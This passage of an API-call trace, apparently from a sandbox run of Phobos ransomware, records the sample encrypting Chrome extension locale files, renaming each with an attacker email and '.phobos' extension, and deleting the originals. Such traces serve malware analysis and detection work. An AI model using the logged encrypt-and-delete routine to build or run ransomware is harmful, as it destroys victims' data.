Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json")) returned 0x2020 [0149.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.770] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.770] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.771] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.771] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.771] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xdd, lpOverlapped=0x0) returned 1 [0149.772] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0149.772] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0149.772] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0149.772] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.772] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.772] CryptDestroyKey (hKey=0xa32d68) returned 1 [0149.772] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.773] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.773] CloseHandle (hObject=0x190) returned 1 [0149.773] CloseHandle (hObject=0x148) returned 1 [0149.773] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json")) returned 1 [0149.774] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.774] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=218) returned 1 [0149.774] CloseHandle (hObject=0x148) returned 1 [0149.774] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json")) returned 0x2020 [0149.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.775] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.775] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.775] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.775] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.775] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xda, lpOverlapped=0x0) returned 1 [0149.779] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0149.779] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0149.780] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0149.780] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.780] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.780] CryptDestroyKey (hKey=0xa32d68) returned 1 [0149.780] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.780] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.780] CloseHandle (hObject=0x148) returned 1 [0149.780] CloseHandle (hObject=0x190) returned 1 [0149.780] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json")) returned 1 [0149.781] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.782] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=248) returned 1 [0149.782] CloseHandle (hObject=0x190) returned 1 [0149.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json")) returned 0x2020 [0149.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.787] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.787] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.788] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.788] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.788] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xf8, lpOverlapped=0x0) returned 1 [0149.789] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100, dwBufLen=0x100 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100) returned 1 [0149.789] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x100, lpOverlapped=0x0) returned 1 [0149.790] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0149.790] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.790] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.790] CryptDestroyKey (hKey=0xa32d68) returned 1 [0149.790] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.790] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.790] CloseHandle (hObject=0x190) returned 1 [0149.790] CloseHandle (hObject=0x148) returned 1 [0149.791] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json")) returned 1 [0149.792] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.792] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=214) returned 1 [0149.792] CloseHandle (hObject=0x148) returned 1 [0149.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json")) returned 0x2020 [0149.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.793] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.793] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.793] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.793] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.793] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd6, lpOverlapped=0x0) returned 1 [0149.802] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0149.802] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0149.803] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0149.803] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.803] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.804] CryptDestroyKey (hKey=0xa32c28) returned 1 [0149.804] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.804] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.804] CloseHandle (hObject=0x148) returned 1 [0149.804] CloseHandle (hObject=0x190) returned 1 [0149.804] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json")) returned 1 [0149.805] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.806] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=254) returned 1 [0149.806] CloseHandle (hObject=0x190) returned 1 [0149.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json")) returned 0x2020 [0149.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.806] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.806] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.807] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.807] CryptSetKeyParam (hKey=0xa32da8, 